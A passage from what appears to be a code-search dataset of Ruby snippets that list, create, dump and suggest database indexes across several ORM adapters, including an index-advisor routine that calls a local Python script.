requested table, since AR is structured that way\n table_name = table_name.downcase\n all_schema_indexes.select{|i| i.table == table_name}\n end",
"def indexes(table_name, name = nil)\n result = query(\"exec sp_helpindex '#{table_name}'\", name)\n \n indexes = []\n result.each do |row|\n if row[1].match('primary key') == nil\n indexes << IndexDefinition.new(table_name, row[0], row[1].match('unique') != nil, row[2].split(',').each {|x| x.strip!})\n end\n end\n \n indexes\n end",
"def indexes(_table_name, _name = nil)\n []\n end",
"def indexes\n @indexes ||= connection.indexes(table_name)\n end",
"def indexes(table_name, name = nil)\n opclasses\n result = select_rows(<<-SQL, name)\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname = ANY (current_schemas(false)) )\n ORDER BY i.relname\n SQL\n result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n inddef = row[3]\n oid = row[4]\n\n columns = Hash[select_rows(<<-SQL, \"Columns for index #{row[0]} on #{table_name}\")]\n SELECT a.attnum::text, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n column_names = columns.values_at(*indkey).compact\n\n # add info on sort order for columns (only desc order is explicitly specified, asc is the default)\n desc_order_columns = inddef.scan(/(\\w+) DESC/).flatten\n orders = desc_order_columns.any? ? Hash[desc_order_columns.map {|order_column| [order_column, :desc]}] : {}\n #changed from rails 3.2\n where = inddef.scan(/WHERE (.+)$/).flatten[0]\n index_type = inddef.scan(/USING (.+?) /).flatten[0].to_sym\n if index_type\n index_op = inddef.scan(/USING .+? \\(.+? (#{opclasses.join('|')})\\)/).flatten\n index_op = index_op[0].to_sym if index_op.present?\n end\n if column_names.present?\n index_def = IndexDefinition.new(table_name, index_name, unique, column_names, [], orders)\n index_def.where = where\n index_def.index_type = index_type if index_type && index_type != :btree\n index_def.index_opclass = index_op if index_type && index_type != :btree && index_op\n index_def\n # else nil\n end\n #/changed\n end.compact\n end",
"def indexes(table_name)\n data = select(\"EXEC sp_helpindex #{quote(table_name)}\", \"SCHEMA\") rescue []\n\n data.reduce([]) do |indexes, index|\n index = index.with_indifferent_access\n\n if index[:index_description] =~ /primary key/\n indexes\n else\n name = index[:index_name]\n unique = index[:index_description].to_s.match?(/unique/)\n where = select_value(\"SELECT [filter_definition] FROM sys.indexes WHERE name = #{quote(name)}\")\n orders = {}\n columns = []\n\n index[:index_keys].split(',').each do |column|\n column.strip!\n\n if column.ends_with?('(-)')\n column.gsub! '(-)', ''\n orders[column] = :desc\n end\n\n columns << column\n end\n\n indexes << IndexDefinition.new(table_name, name, unique, columns, where: where, orders: orders)\n end\n end\n end",
"def indexes(table_name)\n idxs = {}\n results = fetch('show indexes from ' + table_name.to_s).all\n results.each do |idx_entry|\n idx_name = idx_entry[:Name].to_sym\n next if idx_name == :primary # ignore primary index\n idxs[idx_name] ||= { name: idx_name.to_s }\n idx = idxs[idx_name]\n idx[:unique] = idx_entry[:Unique]\n idx[:deferrable] = false\n idx[:columns] ||= []\n idx[:columns] << idx_entry[:Column].to_sym unless idx_entry[:Implicit]\n end\n idxs\n end",
"def indexes(table_name, name = nil)\n select_rows(\n \"SELECT index_name, \"+\n \" is_unique \"+\n \"FROM information_schema.indexes \"+\n \"WHERE table_schema = CURRENT_SCHEMA \"+\n \" AND table_name = '#{quote_string(table_name.to_s)}' \"+\n \" AND index_type <> 'PRIMARY' \"+\n \"ORDER BY index_name\",\n name || SCHEMA_LOG_NAME\n ).map { |row|\n cols = select_rows(\n \"SELECT column_name \"+\n \"FROM information_schema.index_columns \"+\n \"WHERE index_table_schema = CURRENT_SCHEMA \"+\n \" AND index_table_name = '#{quote_string(table_name.to_s)}' \"+\n \" AND index_name = '#{quote_string(row[0])}' \"+\n \"ORDER BY ordinal_position\",\n name || SCHEMA_LOG_NAME\n ).map { |col_row|\n col_row[0]\n }\n IndexDefinition.new(table_name, row[0], row[1] == 'YES', cols, [], {})\n }\n end",
"def indexes(table_name, _name = nil)\n stmt = @connection.indexes(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n index_cols = []\n index_name = nil\n unique = nil\n\n result.each_with_object([]).with_index do |(row, indices), row_idx|\n # Skip table statistics\n next if row[6].zero? # SQLStatistics: TYPE\n\n if row[7] == 1 # SQLStatistics: ORDINAL_POSITION\n # Start of column descriptor block for next index\n index_cols = []\n unique = row[3].zero? # SQLStatistics: NON_UNIQUE\n index_name = String.new(row[5]) # SQLStatistics: INDEX_NAME\n end\n\n index_cols << format_case(row[8]) # SQLStatistics: COLUMN_NAME\n next_row = result[row_idx + 1]\n\n if (row_idx == result.length - 1) || (next_row[6].zero? || next_row[7] == 1)\n indices << ActiveRecord::ConnectionAdapters::IndexDefinition.new(table_name, format_case(index_name), unique, index_cols)\n end\n end\n end",
"def indexes(table_name, _name = nil)\n stmt = @connection.indexes(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n index_cols = []\n index_name = nil\n unique = nil\n\n result.each_with_object([]).with_index do |(row, indices), row_idx|\n # Skip table statistics\n next if row[6].zero? # SQLStatistics: TYPE\n\n if row[7] == 1 # SQLStatistics: ORDINAL_POSITION\n # Start of column descriptor block for next index\n index_cols = []\n unique = row[3].zero? # SQLStatistics: NON_UNIQUE\n index_name = String.new(row[5]) # SQLStatistics: INDEX_NAME\n end\n\n index_cols << format_case(row[8]) # SQLStatistics: COLUMN_NAME\n next_row = result[row_idx + 1]\n\n if (row_idx == result.length - 1) || (next_row[6].zero? || next_row[7] == 1)\n indices << ActiveRecord::ConnectionAdapters::IndexDefinition.new(table_name, format_case(index_name), unique, index_cols)\n end\n end\n end",
"def indexes(table_name, name = nil) #:nodoc:\r\n sql = \"SELECT name, INDEX_OPTIONS & 1 AS [unique], index_expression FROM SYSTEM.INDEXES WHERE parent = '#{table_name}'\"\r\n select(sql, name).map do |row|\r\n index = IndexDefinition.new(table_name, row['name'])\r\n index.unique = row['unique'] == 1\r\n index.columns = row['index_expression']\r\n index\r\n end\r\n end",
"def indexes\n @indexes ||= connection.indexes(table_name, \"#{name} Indexes\")\n end",
"def indexes(table_name, name = nil)\n []\n end",
"def indexes(table_name, name = nil)\n []\n end",
"def indexes(table_name,opts=OPTS)\n m = output_identifier_meth\n idxs = ado_schema_indexes(table_name).inject({}) do |memo, idx|\n unless idx[\"PRIMARY_KEY\"]\n index = memo[m.call(idx[\"INDEX_NAME\"])] ||= {\n :columns=>[], :unique=>idx[\"UNIQUE\"]\n }\n index[:columns] << m.call(idx[\"COLUMN_NAME\"])\n end\n memo\n end\n idxs\n end",
"def indexes(table_name, name = nil)\n result = @connection.indexes.values.select {|ix| ix.table_name == table_name && ix.index_name !~ /^rdb\\$/ }\n indexes = result.map {|ix| IndexDefinition.new(table_name, ix.index_name, ix.unique, ix.columns) }\n indexes\n end",
"def create_hypothetical_index(table, col_set)\n execute(\"SELECT * FROM hypopg_create_index('CREATE INDEX ON #{quote_ident(table)} (#{col_set.map {|c| quote_ident(c[:column])}.join(\", \")})')\").first[\"indexname\"]\n end",
"def get_indices\n @conn.query({url_path: \"#{database}/_index\", method: :get})\n end",
"def build_indexes\n Schema::Physical::Indexes.new\n end",
"def indexes(table, stream)\n if (indexes = @connection.indexes(table)).any?\n add_index_statements = indexes.map do |index|\n statement_parts = [\n ('add_index ' + index.table.inspect),\n index.columns.inspect,\n (':name => ' + index.name.inspect),\n ]\n statement_parts << ':unique => true' if index.unique\n\n index_lengths = (index.lengths || []).compact\n statement_parts << (':length => ' + Hash[index.columns.zip(index.lengths)].inspect) unless index_lengths.empty?\n\n index_orders = (index.orders || {})\n statement_parts << (':order => ' + index.orders.inspect) unless index_orders.empty?\n\n # changed from rails 2.3\n statement_parts << (':where => ' + index.where.inspect) if index.where\n statement_parts << (':index_type => ' + index.index_type.inspect) if index.index_type\n statement_parts << (':index_opclass => ' + index.index_opclass.inspect) if index.index_opclass.present?\n # /changed\n\n ' ' + statement_parts.join(', ')\n end\n\n stream.puts add_index_statements.sort.join(\"\\n\")\n stream.puts\n end\n end",
"def create_indexes\n source_attributes = self.base_class.attributes\n self.indexes.each do |name, index|\n opts = {:table_name => index.table_name, :id => :id}\n if index.range_key?\n if index.range_keys.select{|v| !source_attributes[v].nil? && source_attributes[v][:type] == :string}.any?\n opts[:range_key] = { :range => :string }\n else\n opts[:range_key] = { :range => :number }\n end\n else\n opts[:range_key] = nil\n end\n self.create_table(opts)\n end\n end",
"def indexes_per_table\n 65_535\n end",
"def load_physical_schema(conn, builder)\n builder.indexes{\n conn.tables.each{|table|\n conn.indexes(table).each_pair{|name, defn|\n next if defn[:unique]\n builder.index(name, {:relvar => table, :attributes => defn[:columns]})\n }\n }\n }\n end",
"def create_table_indices(klass)\n for idx in sql_indices_for_class(klass)\n anno = klass.ann(idx)\n idx = idx.to_s\n pre_sql, post_sql = klass.ann(idx, :pre_index), klass.ann(idx, :post_index)\n idxname = idx.gsub(/ /, \"\").gsub(/,/, \"_\").gsub(/\\(.*\\)/, \"\")\n sql = \"CREATE #{pre_sql} INDEX #{klass.table}_#{idxname}_idx #{post_sql} ON #{klass.table} (#{idx})\"\n exec(sql)\n end\n end",
"def indexes\n raise 'not implemented'\n end",
"def create_indexes\n indexes = %w{ Page(page_id) Trait(eol_pk) Trait(resource_pk) Term(uri) Term(name)\n Resource(resource_id) MetaData(eol_pk)}\n indexes.each do |index|\n begin\n query(\"CREATE INDEX ON :#{index};\")\n rescue Neography::NeographyError => e\n if e.to_s =~ /already created/\n puts \"Already have an index on #{index}, skipping.\"\n else\n raise e\n end\n end\n end\n end",
"def import_indexes( table )\n # Foreign keys also automatically create indexes, which we must exclude when importing.\n # But only if they look like indexes named by the automatic foreign key naming convention.\n foreign_key_indexes = table.foreign_keys.map{ |x| x.columns if x.columns.size == 1 }.compact\n for name, opts in db.indexes( table.name )\n opts = opts.dup\n opts[ :name ] = name\n columns = opts.delete( :columns )\n next if ( ! opts[ :unique ] ) && foreign_key_indexes.include?( columns ) && name == columns.first\n # Sequel currently doesn't provide info about fulltext indexes, so we have to rely on properly used names.\n opts[ :type ] = :full_text if name =~ /_fulltext$/\n opts.delete( :deferrable ) unless opts[ :deferrable ]\n table.add_index( columns, opts )\n end\n end",
"def index_sql_list(table_name, indexes)\n indexes.map{|i| index_definition_sql(table_name, i)}\n end",
"def create_i18n_indexes(table_name)\n i18n_indexes.each do |index|\n unless indexes(table_name).map(&:columns).flatten.include? index.to_s\n add_index table_name, index\n end\n end\n end",
"def indexes(table, opts=OPTS)\n return super unless opts.empty?\n\n quoted_name = literal(table)\n if v = Sequel.synchronize{@indexes[quoted_name]}\n return v\n end\n\n result = super\n Sequel.synchronize{@indexes[quoted_name] = result}\n result\n end",
"def get_index_info(klass)\n index_info = []\n indexes = klass.connection.indexes(klass.table_name)\n indexes.each do |index|\n index_info << { :name => index.name, :columns => index.columns.join(\", \"), :unique => (index.unique ? \"UNIQUE\" : \"NO\") }\n end\n index_info\n end",
"def indexes_on(partitioned_table)\n return [] if Gem::Version.new(Rails.version) >= Gem::Version.new('6.0.3')\n return [] unless connection.supports_indexes_on_partitioned_tables?\n\n Indexes.new(connection).on(partitioned_table)\n end",
"def indexes\n @model.indexes.select{|index| index.columns.include? self.name}\n end",
"def index_definition_sql(table_name, index)\n\t raise Error, \"Partial indexes are not supported for this database\" if index[:where]\n\n\t # Basic index creation DDL.\n\t sql = [\"CREATE\"]\n\t case index[:type]\n\t when :bitmap\n\t\t raise Error, \"Bitmap indexes cannot be unique\" if index[:unique]\n\t sql << 'BITMAP'\n\t when NilClass, :normal\n\t sql << 'UNIQUE' if index[:unique]\n\t else\n\t raise Error, \"Index type #{index[:type].inspect} is not supported for this database\"\n\t end\n\t index_name = index[:name] || default_index_name(table_name, index[:columns])\n\t qualified_table_name = quote_schema_table table_name\n\t sql << \"INDEX #{quote_identifier(index_name)} ON #{qualified_table_name}\"\n\t \n\t # Index columns and join indexes.\n index_join, index_columns = *index.values_at(:join,:columns)\n\t sql << literal(index_columns)\n if index_join\n\t\t raise Error, \"Join clauses are only supported for bitmap indexes\" if index[:type]!=:bitmap\n\t\t sql << \"FROM #{qualified_table_name},\"\n\t\t sql << index_columns.map{|k| quote_identifier schema_and_table(k).first }.uniq.join(', ')\n\t\t \n\t\t # TODO: Document this short-hand syntax: {:columns=>[:ref_table__ref_column], :join=>[:fk_column]}\n if Array===index_join and index_join.length==index_columns.length and index_join.all?{|k| Symbol===k}\n index_join = Hash[ index_join.map{|k| :\"#{table_name}__#{k}\" }.zip(index_columns) ]\n end\n\n\t sql << \"WHERE #{filter_expr(index_join)}\"\n\t end\n\t \n\t # Index attributes and options.\n\t sql << 'LOCAL' if index[:partitioned]\n\t sql << flag_option_sql(index, :parallel)\n\t sql << flag_option_sql(index, :logging)\n\t sql << \"TABLESPACE #{quote_identifier(index[:tablespace])}\" if index[:tablespace]\n\t sql << flag_option_sql(index, :visible, 'INVISIBLE')\n\t sql << compress_option_sql(index)\n\t sql << index[:options] if String === index[:options]\n\t sql << 'UNUSABLE' if FalseClass === index[:valid]\n\t sql.compact.join ' '\n\t end",
"def create_hypothetical_indexes(queries, tables)\n candidates = {}\n\n # get initial costs for queries\n calculate_plan(queries)\n explainable_queries = queries.select {|q| q.explainable? && q.high_cost?}\n\n # filter tables for performance\n tables = Set.new(explainable_queries.flat_map(&:tables))\n tables_from_views = Set.new(explainable_queries.flat_map(&:tables_from_views))\n\n if tables.any?\n # since every set of multi-column indexes are expensive\n # try to parse out columns\n possible_columns = Set.new\n explainable_queries.each do |query|\n log \"Finding columns: #{query.statement}\" if @log_level == \"debug3\"\n find_columns(query.tree).each do |col|\n last_col = col[\"fields\"].last\n if last_col[\"String\"]\n possible_columns << last_col[\"String\"][\"str\"]\n end\n end\n end\n\n # create hypothetical indexes\n # use all columns in tables from views\n columns_by_table = columns(tables).select {|c| possible_columns.include?(c[:column]) || tables_from_views.include?(c[:table])}.group_by {|c| c[:table]}\n\n # create single column indexes\n create_hypothetical_indexes_helper(columns_by_table, 1, candidates)\n\n # get next round of costs\n calculate_plan(explainable_queries)\n\n # create multicolumn indexes\n create_hypothetical_indexes_helper(columns_by_table, 2, candidates)\n\n # get next round of costs\n calculate_plan(explainable_queries)\n end\n\n candidates\n end",
"def to_create_index_sql\n queries = []\n unless indexes.blank?\n indexes.each do |column|\n sql = \"CREATE INDEX #{to_s.downcase}_#{column}_index ON \"\n sql << \"#{to_sql} (#{column.to_sql})\"\n queries << sql.compress_lines\n end\n end\n queries\n end",
"def find_indexes(plan)\n find_by_key(plan, \"Index Name\")\n end",
"def index_list_sql_list(table_name, indexes)\n indexes.map{|i| index_definition_sql(table_name, i)}\n end",
"def test_indexes\n idx_name = \"accounts_idx\"\n\n indexes = @connection.indexes(\"accounts\")\n assert_empty indexes\n\n @connection.add_index :accounts, :firm_id, name: idx_name\n indexes = @connection.indexes(\"accounts\")\n assert_equal \"accounts\", indexes.first.table\n assert_equal idx_name, indexes.first.name\n assert !indexes.first.unique\n assert_equal [\"firm_id\"], indexes.first.columns\n ensure\n @connection.remove_index(:accounts, name: idx_name) rescue nil\n end",
"def test_indexes\n idx_name = \"accounts_idx\"\n\n indexes = @connection.indexes(\"accounts\")\n assert_empty indexes\n\n @connection.add_index :accounts, :firm_id, name: idx_name\n indexes = @connection.indexes(\"accounts\")\n assert_equal \"accounts\", indexes.first.table\n assert_equal idx_name, indexes.first.name\n assert !indexes.first.unique\n assert_equal [\"firm_id\"], indexes.first.columns\n ensure\n @connection.remove_index(:accounts, name: idx_name) rescue nil\n end",
"def indexes\r\n if !@indexes\r\n require \"#{File.dirname(__FILE__)}/drivers/#{@opts[:type]}/knjdb_#{@opts[:type]}_indexes\" if (!@opts.key?(:require) or @opts[:require])\r\n @indexes = Kernel.const_get(\"KnjDB_#{@opts[:type]}\".to_sym).const_get(:Indexes).new(\r\n :db => self\r\n )\r\n end\r\n \r\n return @indexes\r\n end",
"def create_table_indexes_from_generator(name, generator, options)\n e = options[:ignore_index_errors] || options[:if_not_exists]\n generator.indexes.each do |index|\n begin\n pr = proc{index_sql_list(name, [index]).each{|sql| execute_ddl(sql)}}\n supports_transactional_ddl? ? transaction(:savepoint=>:only, &pr) : pr.call\n rescue Error\n raise unless e\n end\n end\n end",
"def indexed_facets(model_name)\n tables.grep(/_#{model_name}_(\\w+)_index/) { $1 }\n end",
"def index_by_name(table_name, index_name)\n index_record = data_dictionary.index_by_name(table_name, index_name)\n\n index_space = space(index_record[\"SPACE\"])\n describer = data_dictionary.record_describer_by_index_name(table_name, index_name)\n index_space.index(index_record[\"PAGE_NO\"], describer)\n end",
"def check_indexes(table)\n indexes = table_indexes(table)\n\n indexes.permutation(2).each_with_object([]) do |(source_index, target_index), response|\n next unless source_index.columns.start_with?(target_index.columns)\n\n if target_index.unique\n response << {\n index: source_index,\n result: \"#{source_index.name} has column(s) on the right side of unique index (#{target_index.name}). You can drop if low cardinality\",\n }\n else\n response << {\n index: target_index,\n result: \"#{target_index.name} is a left-prefix of #{source_index.name}\",\n }\n end\n end\n end",
"def index_list_sql_list(table_name, indexes)\n indexes.map{|i| index_definition_sql(table_name, i)}\n end",
"def index_list_sql_list(table_name, indexes)\n indexes.map{|i| index_definition_sql(table_name, i)}\n end",
"def supports_indexes_on_partitioned_tables?\n postgresql_version >= 110_000\n end",
"def create_indexes(table)\n return if !@index\n if !@dry_run\n begin\n connection.query(\"ALTER IGNORE TABLE #{table} ADD PRIMARY KEY (dtime, id)\")\n verbose \" Created primary key index.\"\n rescue\n nil # If we couldn't create the index (because it exists), that's OK.\n end\n end\n end",
"def index_information\n @db.index_information(@name)\n end",
"def install_missing_indexes\n db_connection.execute(\n <<-SQL\n SELECT install_missing_indexes();\n SQL\n )\n end",
"def indexusage\n sql = %q(SELECT\n relname,\n 100 * idx_scan / (seq_scan + idx_scan) percent_of_times_index_used,\n n_live_tup rows_in_table\n FROM\n pg_stat_user_tables\n ORDER BY\n n_live_tup DESC;)\n exec_sql(sql, find_uri)\n end",
"def indexes(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n {}\n end",
"def setup_db_index\n self.copy_tables.each do |t|\n no_sql_connection.create_pre_mongified_id_index(t.name)\n end\n end",
"def all_indexes\n Chewy.eager_load!\n Chewy::Index.descendants - [Chewy::Stash::Journal, Chewy::Stash::Specification]\n end",
"def generate_index tab_name, argv\n\t\tquery = \" CREATE INDEX #{argv[argv.keys[0]]} ON #{tab_name} (#{argv[argv.keys[1]]}) \"\n\t\tputs query\n\t\treturn query\n\tend",
"def index_information\n @db.index_information(@name)\n end",
"def dump_partition_indexes(partitioned_table, stream)\n return unless Tablature.database.respond_to?(:indexes_on)\n\n indexes = Tablature.database.indexes_on(partitioned_table.name)\n return if indexes.empty?\n\n add_index_statements = indexes.map do |index|\n table_name = remove_prefix_and_suffix(index.table).inspect\n \" add_index #{([table_name] + index_parts(index)).join(', ')}\"\n end\n\n stream.puts add_index_statements.sort.join(\"\\n\")\n stream.puts\n end",
"def dump_table_indexes(table, meth, options={})\n return '' unless respond_to?(:indexes)\n im = method(:index_to_generator_opts)\n indexes = indexes(table).sort_by{|k,v| k.to_s} \n gen = Schema::Generator.new(self) do\n indexes.each{|iname, iopts| send(:index, iopts[:columns], im.call(table, iname, iopts))}\n end\n gen.dump_indexes(meth=>table, :ignore_errors=>!options[:same_db])\n end",
"def _indexes_ds\n @_indexes_ds ||= begin\n if server_version >= 90500\n order = [Sequel[:indc][:relname], Sequel.function(:array_position, Sequel[:ind][:indkey], Sequel[:att][:attnum])]\n # :nocov:\n else\n range = 0...32\n order = [Sequel[:indc][:relname], SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(Sequel[:ind][:indkey], [x]), x]}, 32, Sequel[:att][:attnum])]\n # :nocov:\n end\n\n attnums = SQL::Function.new(:ANY, Sequel[:ind][:indkey])\n\n ds = metadata_dataset.\n from{pg_class.as(:tab)}.\n join(Sequel[:pg_index].as(:ind), :indrelid=>:oid).\n join(Sequel[:pg_class].as(:indc), :oid=>:indexrelid).\n join(Sequel[:pg_attribute].as(:att), :attrelid=>Sequel[:tab][:oid], :attnum=>attnums).\n left_join(Sequel[:pg_constraint].as(:con), :conname=>Sequel[:indc][:relname]).\n where{{\n indc[:relkind]=>%w'i I',\n ind[:indisprimary]=>false,\n :indexprs=>nil,\n :indisvalid=>true}}.\n order(*order).\n select{[indc[:relname].as(:name), ind[:indisunique].as(:unique), att[:attname].as(:column), con[:condeferrable].as(:deferrable)]}\n\n # :nocov:\n ds = ds.where(:indisready=>true) if server_version >= 80300\n ds = ds.where(:indislive=>true) if server_version >= 90300\n # :nocov:\n\n ds\n end\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n if index[:type]\n raise Error, \"Index types are not supported for this database\"\n elsif index[:where]\n raise Error, \"Partial indexes are not supported for this database\"\n else\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{index_name} ON #{quote_identifier(table_name)} #{literal(index[:columns])}\"\n end\n end",
"def index_exists_by_name?(table, index)\n indexes_for_table[table].include?(index)\n end",
"def indexes\n @indexes ||= []\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n if index[:type]\n raise Error, \"Index types are not supported for this database\"\n elsif index[:where]\n raise Error, \"Partial indexes are not supported for this database\"\n else\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{quote_identifier(index_name)} ON #{quote_identifier(table_name)} #{literal(index[:columns])}\"\n end\n end",
"def indexes(query)\n indexes = query.model.sphinx_indexes(name) if query.model.respond_to?(:sphinx_indexes)\n if indexes.nil? or indexes.empty?\n indexes = [Index.new(query.model, query.model.storage_name(name))]\n end\n indexes\n end",
"def ensureIndex(table,keys,options={})\n connection.ensureIndex(path(table),keys,options)\n end",
"def to_create_composite_index_sql\n queries = []\n unless composite_indexes.blank?\n composite_indexes.each do |columns, unique|\n sql = \"CREATE #{unique ? 'UNIQUE ' : ''}INDEX \"\n sql << \"#{to_s.downcase}_#{columns.join('_')}_index ON \"\n sql << \"#{to_sql} (#{columns.join(', ')})\"\n queries << sql.compress_lines\n end\n end\n queries\n end",
"def default_index_name(table_name, columns)\n\t\t schema, table = schema_and_table(table_name)\n\t\t ds = DB[:all_indexes].where(:table_name=>table,:dropped=>'NO')\n\t\t ds = ds.where :owner=>schema unless schema.nil?\n\t\t \"#{table[0,25]}_ix%2.2d\" % [ds.count + 1]\n\t\t end",
"def indexes\n Indexes.new(database, name)\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n if index[:type]\n raise Error, \"Index types are not supported for this database\"\n elsif index[:where]\n raise Error, \"Partial indexes are not supported for this database\"\n else\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{quote_identifier(index_name)} ON #{quote_identifier(table_name)} #{literal(index[:columns])}\"\n end\n end",
"def create_indexes_for_all_models\n required_types.values.each do |required_type_class_object|\n required_type_class_object.send(:create_indexes)\n end\n end",
"def add_indexes\n if hereditary? && !index_options[{ _type: 1 }]\n index({ _type: 1 }, { unique: false, background: true })\n end\n true\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n raise Error, \"Index types are not supported for this database\" if index[:type]\n raise Error, \"Partial indexes are not supported for this database\" if index[:where] && !supports_partial_indexes?\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{quote_identifier(index_name)} ON #{quote_schema_table(table_name)} #{literal(index[:columns])}#{\" WHERE #{filter_expr(index[:where])}\" if index[:where]}\"\n end",
"def determine_indexes(queries, candidates, tables)\n new_indexes = {}\n index_name_to_columns = candidates.invert\n\n # filter out existing indexes\n # this must happen at end of process\n # since sometimes hypothetical indexes\n # can give lower cost than actual indexes\n index_set = Set.new\n if tables.any?\n indexes(tables).each do |index|\n if index[\"using\"] == \"btree\"\n # don't add indexes that are already covered\n index_set << [index[\"table\"], index[\"columns\"].first(1)]\n index_set << [index[\"table\"], index[\"columns\"].first(2)]\n end\n end\n end\n\n savings_ratio = (1 - @min_cost_savings_pct / 100.0)\n\n queries.each do |query|\n if query.explainable? && query.high_cost?\n new_cost, new_cost2 = query.costs[1..2]\n\n cost_savings = new_cost < query.initial_cost * savings_ratio\n\n # set high bar for multicolumn indexes\n cost_savings2 = new_cost > 100 && new_cost2 < new_cost * savings_ratio\n\n key = cost_savings2 ? 2 : 1\n query_indexes = hypo_indexes_from_plan(index_name_to_columns, query.plans[key], index_set)\n\n # likely a bad suggestion, so try single column\n if cost_savings2 && query_indexes.size > 1\n query_indexes = hypo_indexes_from_plan(index_name_to_columns, query.plans[1], index_set)\n cost_savings2 = false\n end\n\n suggest_index = cost_savings || cost_savings2\n\n cost_savings3 = false\n new_cost3 = nil\n\n # if multiple indexes are found (for either single or multicolumn)\n # determine the impact of each individually\n # there may be a better single index that we're not considering\n # that didn't get picked up by pass1 or pass2\n # TODO clean this up\n # TODO suggest more than one index from this if savings are there\n if suggest_index && query_indexes.size > 1\n winning_index = nil\n winning_cost = nil\n winning_plan = nil\n\n query_indexes.each do |query_index|\n reset_hypothetical_indexes\n create_hypothetical_index(query_index[:table], query_index[:columns].map {|v| {column: v}})\n plan3 = plan(query.statement)\n cost3 = plan3[\"Total Cost\"]\n\n if !winning_cost || cost3 < winning_cost\n winning_cost = cost3\n winning_index = query_index\n winning_plan = plan3\n end\n end\n\n query.plans << winning_plan\n\n # duplicated from above\n # TODO DRY\n use_winning =\n if cost_savings2\n new_cost > 100 && winning_cost < new_cost * savings_ratio\n else\n winning_cost < query.initial_cost * savings_ratio\n end\n\n if use_winning\n query_indexes = [winning_index]\n cost_savings3 = true\n new_cost3 = winning_cost\n query.pass3_indexes = query_indexes\n else\n suggest_index = false\n end\n end\n\n if suggest_index\n query_indexes.each do |index|\n new_indexes[index] ||= index.dup\n (new_indexes[index][:queries] ||= []) << query\n end\n end\n\n query.indexes = query_indexes\n query.suggest_index = suggest_index\n query.new_cost =\n if suggest_index\n cost_savings3 ? new_cost3 : (cost_savings2 ? new_cost2 : new_cost)\n else\n query.initial_cost\n end\n\n # TODO optimize\n if @log_level.start_with?(\"debug\")\n query.pass1_indexes = hypo_indexes_from_plan(index_name_to_columns, query.plans[1], index_set)\n query.pass2_indexes = hypo_indexes_from_plan(index_name_to_columns, query.plans[2], index_set)\n end\n end\n end\n\n # filter out covered indexes\n covered = Set.new\n new_indexes.values.each do |index|\n if index[:columns].size > 1\n covered << [index[:table], index[:columns].first(1)]\n end\n end\n\n ###\n #\n # Project modifications start\n #\n ###\n\n # init set of indexes\n new_indexes_2 = Set.new\n\n # change working directory to specified path with zaman py\n Dir.chdir('/home/vagrant/dexter/lib/dexter') do\n # create array to store queries from log file\n queries_array = Array.new\n\n # iterate through Query object array\n for query in queries\n\n # extract queries (and remove \\t \\n and multiple white space)\n clean_string = (query.statement).gsub(/\\n/, \" \")\n clean_string = clean_string.gsub(/\\t/, \" \")\n fix_string = clean_string.squeeze\n\n # store in queries array\n queries_array.push(fix_string)\n end\n\n # open json file to pass data to zaman.py\n File.open(\"queries.json\", \"w\") do |f|\n # write queries to json file\n f.write(queries_array.to_json)\n end\n\n # create array to store tables names\n table_names = Array.new\n\n # loop through tables set and put name in array\n tables.each do |n|\n table_names.push(n)\n end\n\n # write table names to file\n File.open(\"tables.json\", \"w\") do |f|\n # write tables to json file\n f.write(table_names.to_json)\n end\n\n puts('Data written to json')\n\n # shell out / call zaman python script through sys commands\n # using back ticks ``\n puts('Shelling out to zaman.py')\n\n # error handling for zaman py response\n begin\n zamans_indexes = `python zaman.py queries`\n puts('zaman.py has executed')\n\n # parse json output to set\n zamans_indexes = JSON.parse(zamans_indexes)\n\n # assign suggested indexes from zaman.py to new_indexes_2 set\n new_indexes_2 = zamans_indexes\n puts('suggested indexes received')\n\n rescue\n puts('Error executing zaman.py')\n end\n end\n\n # TODO: cost estimation\n # since the main focus of this project is over Zaman's algorithm, new_indexes_2 takes preference.\n # computes intersection of both new_indexes sets\n if new_indexes.empty?\n new_indexes = new_indexes_2\n elsif new_indexes_2.empty?\n new_indexes = new_indexes\n else\n # set intersection between zamans suggested indices and dexters suggested indices\n new_indexes = new_indexes & new_indexes_2\n end\n\n ###\n #\n # Project modifications end here\n #\n ###\n\n\n # filter out covered indexes\n covered = Set.new\n new_indexes.values.each do |index|\n if index[:columns].size > 1\n covered << [index[:table], index[:columns].first(1)]\n end\n end\n\n new_indexes.values.reject {|i| covered.include?([i[:table], i[:columns]])}.sort_by(&:to_a)\n\n end",
"def dump_table_indexes(table, meth, options=OPTS)\n if supports_index_parsing?\n indexes = indexes(table).sort\n else\n return ''\n end\n\n im = method(:index_to_generator_opts)\n gen = create_table_generator do\n indexes.each{|iname, iopts| send(:index, iopts[:columns], im.call(table, iname, iopts, options))}\n end\n gen.dump_indexes(meth=>table, :ignore_errors=>!options[:same_db])\n end",
"def create_index(table_name, index_spec)\n @iadmin ||= IndexedTableAdmin.new(@configuration)\n @iadmin.addIndex(table_name.to_java_bytes, index_spec)\nend",
"def clustered_index_by_table_name(table_name)\n data_dictionary.clustered_index_name_by_table_name(table_name)\n end",
"def index\n @schema_tables = SchemaTable.all\n end",
